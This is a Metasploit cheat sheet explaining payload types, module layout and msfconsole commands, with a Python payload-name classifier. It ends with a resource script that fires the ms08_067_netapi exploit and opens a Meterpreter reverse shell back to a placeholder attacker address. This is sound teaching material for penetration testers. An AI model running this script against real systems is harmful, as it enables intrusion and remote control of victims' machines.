Metasploit
Cheat Sheet
You already know what a vulnerability is.
An exploit is a piece of code written to take advantage of a particular vulnerability.
A payload is a piece of code to be executed through said exploit.
Have a look at the Metasploit Framework. At its core it is a collection of exploits and payloads. Each exploit can be paired with various payloads such as reverse or bind shells, the Meterpreter shell, etc.
The beauty of the Metasploit Framework is that it is modular. You can mix and match different payloads and exploits to achieve the needed results.
From <https://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf>
- Metasploit: The Metasploit Framework is a development platform for developing and using security tools and exploits.
- Metasploit Meterpreter: Meterpreter is a payload within the Metasploit Framework that provides control over an exploited target system, running as a DLL loaded inside of any process on a target machine.
- Metasploit msfvenom: msfvenom is a component of the Metasploit Framework that allows users to generate a standalone version of any payload within the framework. Payloads can be generated in a variety of formats including executable, Ruby script, and raw shellcode. The msfvenom tool can also encode payloads to help avoid detection.
What Does Payload Mean?
A payload in Metasploit is the code that runs on the target once an exploit succeeds. It is a payload module, not an exploit module: the exploit delivers it, the payload does the work afterwards. There are three different types of payload modules in the Metasploit Framework: Singles, Stagers, and Stages. A single is self-contained and does everything in one piece; a stager is a small piece of code that sets up the network connection and pulls down the rest; a stage is the larger payload (a shell, Meterpreter, etc.) that the stager downloads and runs. These different types allow for a great deal of versatility and can be useful across numerous types of scenarios.
Whether or not a payload is staged is reflected in the '/' separators of the payload name. For example, "windows/shell_bind_tcp" is a single payload with no stage, whereas "windows/shell/bind_tcp" consists of a stager (bind_tcp) and a stage (shell).
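To make the naming convention above concrete, here is a small classifier that splits a payload reference name into platform, optional architecture, and either a single or a stage/stager pair, and applies it to a `show payloads` dump. This is an added example, not code from the original page or from the Metasploit project. The `ARCHES` set is an assumption built from the `encoders/` and `nops/` directory listings further down the page plus a few other Metasploit architecture names; the sample `show payloads` text is constructed here (the first rows copy the page, the rest are added), and `cmd/*` payloads are deliberately reported as unhandled because they use a deeper sub-platform layout that this two-level rule would misclassify.

```python
"""Classify Metasploit payload names as inline (single) or staged.

Added example, not code from the original page or the Metasploit project.
It applies the naming convention the page describes:
    platform[/arch]/<single>          e.g. windows/shell_bind_tcp
    platform[/arch]/<stage>/<stager>  e.g. windows/shell/bind_tcp
"""
from dataclasses import dataclass
from typing import Dict, List, Optional

# Assumed architecture tokens that may sit between the platform and the payload
# body. Taken from the page's encoders/ and nops/ listings (x86, x64, aarch64,
# armle, mipsbe, mipsle, ppc, sparc) plus a few common extras. Not exhaustive.
ARCHES = {
    "x86", "x64", "aarch64", "armle", "armbe", "mipsbe", "mipsle", "mips64",
    "ppc", "ppc64", "sparc", "sparc64",
}


@dataclass(frozen=True)
class PayloadName:
    platform: str
    arch: Optional[str]
    staged: bool
    stage: Optional[str]    # "shell", "meterpreter", ... for staged payloads
    stager: Optional[str]   # "bind_tcp", "reverse_tcp", ... for staged payloads
    single: Optional[str]   # "shell_bind_tcp", ... for inline payloads


def parse_payload_name(name: str) -> PayloadName:
    """Split a payload reference name into platform, arch and stage/stager.

    Only the two-level layout above is handled. cmd/* payloads carry extra
    sub-platform components (cmd/unix/reverse_bash is a single, despite the
    two trailing parts), so they raise ValueError instead of being misread.
    """
    parts = name.strip().strip("/").split("/")
    if len(parts) < 2 or not all(parts):
        raise ValueError(f"not a payload name: {name!r}")
    platform, rest = parts[0], parts[1:]
    if platform == "cmd":
        raise ValueError(f"cmd/* payloads use a sub-platform layout not handled here: {name!r}")
    arch = None
    if len(rest) > 1 and rest[0] in ARCHES:
        arch, rest = rest[0], rest[1:]
    if len(rest) == 1:
        return PayloadName(platform, arch, False, None, None, rest[0])
    if len(rest) == 2:
        return PayloadName(platform, arch, True, rest[0], rest[1], None)
    raise ValueError(f"unhandled payload layout: {name!r}")


def names_from_show_payloads(text: str) -> List[str]:
    """Pull payload reference names out of a 'show payloads' dump.

    The disclosure-date column is often blank, so fixed column positions are
    unreliable; the name is always the first token and always contains '/'.
    """
    names = []
    for line in text.splitlines():
        tokens = line.split()
        if tokens and "/" in tokens[0]:
            names.append(tokens[0])
    return names


def summarize(text: str) -> Dict[str, List[str]]:
    """Group the payloads in a 'show payloads' dump into single/staged/unhandled."""
    groups: Dict[str, List[str]] = {"single": [], "staged": [], "unhandled": []}
    for name in names_from_show_payloads(text):
        try:
            info = parse_payload_name(name)
        except ValueError:
            groups["unhandled"].append(name)
            continue
        groups["staged" if info.staged else "single"].append(name)
    return groups


# Constructed sample in the layout msfconsole prints. The aix/ and generic/
# rows are from the page; the remaining rows were added for this example.
SAMPLE_SHOW_PAYLOADS = """\
Payloads
========

   Name                                 Disclosure Date  Rank    Description
   ----                                 ---------------  ----    -----------
   aix/ppc/shell_bind_tcp                                normal  AIX Command Shell, Bind TCP Inline
   aix/ppc/shell_find_port                               normal  AIX Command Shell, Find Port Inline
   generic/custom                                        normal  Custom Payload
   windows/shell_bind_tcp                                normal  Windows Command Shell, Bind TCP Inline
   windows/shell/bind_tcp                                normal  Windows Command Shell, Bind TCP Stager
   windows/x64/meterpreter/reverse_tcp                   normal  Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager
   cmd/unix/reverse_bash                                 normal  Unix Command Shell, Reverse TCP (/dev/tcp)
"""

if __name__ == "__main__":
    for name in names_from_show_payloads(SAMPLE_SHOW_PAYLOADS):
        try:
            p = parse_payload_name(name)
        except ValueError as err:
            print(f"{name}: {err}")
            continue
        kind = f"staged (stage={p.stage}, stager={p.stager})" if p.staged else f"single ({p.single})"
        print(f"{name}: platform={p.platform} arch={p.arch} {kind}")
```

Running the script prints one line per payload in the sample; the useful part is that "windows/x64/meterpreter/reverse_tcp" comes out as stage meterpreter plus stager reverse_tcp on x64, while "aix/ppc/shell_bind_tcp" is recognised as a single with ppc as the architecture rather than as a stage.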
- Metasploitable 2 Exploitability Guide
- Penetration Testing Lab - rlogin Service Exploitation (install rsh-client on Kali first: apt-get install rsh-client)
- Penetration Testing Practice Lab - AmanHardika
source: https://www.offensive-security.com/metasploit-unleashed/modules-and-locations/
Exploits
In the Metasploit Framework, exploit modules are defined as modules that use payloads.
root@kali:~# ls /usr/share/metasploit-framework/modules/exploits/
aix bsdi firefox irix multi solaris
android dialup freebsd linux netware unix
apple_ios example.rb hpux mainframe osx windows
Auxiliary
Auxiliary modules include port scanners, fuzzers, sniffers, and more.
root@kali:~# ls /usr/share/metasploit-framework/modules/auxiliary/
admin client dos gather scanner spoof vsploit
analyze crawler example.rb parser server sqli
bnat docx fuzzers pdf sniffer voip
Payloads, Encoders, Nops
Payloads consist of code that runs remotely; encoders transform the payload bytes so they avoid bad characters and survive filtering on the way to the target; NOP generators pad payloads so their sizes stay consistent across exploit attempts.
root@kali:~# ls /usr/share/metasploit-framework/modules/payloads/
singles stagers stages
root@kali:~# ls /usr/share/metasploit-framework/modules/encoders/
cmd generic mipsbe mipsle php ppc ruby sparc x64 x86
root@kali:~# ls /usr/share/metasploit-framework/modules/nops/
aarch64 armle mipsbe php ppc sparc tty x64 x86
use command
When you have decided on a particular module to make use of, issue the use command to select it. The use command changes your context to that module and exposes type-specific commands. Any global variables you set earlier with setg are already populated in the module's options.
msf > use dos/windows/smb/ms09_001_write
msf auxiliary(ms09_001_write) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
msf auxiliary(ms09_001_write) >
Using MSFconsole Payloads
Running show payloads will display all of the different payloads for all platforms available within Metasploit.
msf > show payloads
Payloads
========
Name Disclosure Date Rank Description
---- --------------- ---- -----------
aix/ppc/shell_bind_tcp normal AIX Command Shell, Bind TCP Inline
aix/ppc/shell_find_port normal AIX Command Shell, Find Port Inline
aix/ppc/shell_interact normal AIX execve shell for inetd
...snip...
As you can see, there are a lot of payloads available. Fortunately, when you are in the context of a particular exploit, running show payloads will only display the payloads that are compatible with that particular exploit. For instance, if it is a Windows exploit, you will not be shown the Linux payloads.
msf exploit(ms08_067_netapi) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
generic/custom normal Custom Payload
generic/debug_trap normal Generic x86 Debug Trap
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
...snip...
- Ctrl+Z will prompt you to background the session, giving you the Metasploit console back. sessions -l lists backgrounded sessions and sessions -i N resumes one.
- Ctrl+C will drop the session altogether.
- The back command leaves the current module context.
- If Metasploit didn't give you a shell directly but instead says "Shell session [N] opened...", that means your exploit worked and Metasploit has a connection open to the target waiting for you. If you don't get your msf prompt back, hit Ctrl+C ONCE. Hitting it twice will drop you out of Metasploit.
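A resource script that ties the steps above together (a global set with setg carrying over into the module's options, use, payload selection against the compatible list, and running the exploit as a background job). This is an added example, not from the original page or the Metasploit project. The addresses are placeholders from the TEST-NET-1 documentation range, and whether the target option is spelled RHOST (as in the ms09_001_write output above) or RHOSTS depends on the framework version you run, so check show options before relying on it. Save it to a file and run msfconsole -q -r file.rc.

```text
# Constructed example. 192.0.2.10 is the attacker, 192.0.2.20 the target.
# Globals set here are already filled in when the module is selected below.
setg LHOST 192.0.2.10
setg RHOSTS 192.0.2.20
use exploit/windows/smb/ms08_067_netapi
# Confirm RHOSTS and LHOST were picked up from setg before choosing a payload.
show options
# Only payloads compatible with this exploit are listed here.
show payloads
set PAYLOAD windows/meterpreter/reverse_tcp
# -j runs the exploit as a background job, -z does not interact with a new session.
exploit -j -z
# The session opens in the background; list it, then attach with sessions -i N.
sessions -l
```

Running as a job with -z is the scripted equivalent of the Ctrl+Z tip above: the session is kept open by the framework without ever dropping you into it, so the console stays usable and a stray Ctrl+C cannot kill the session by accident.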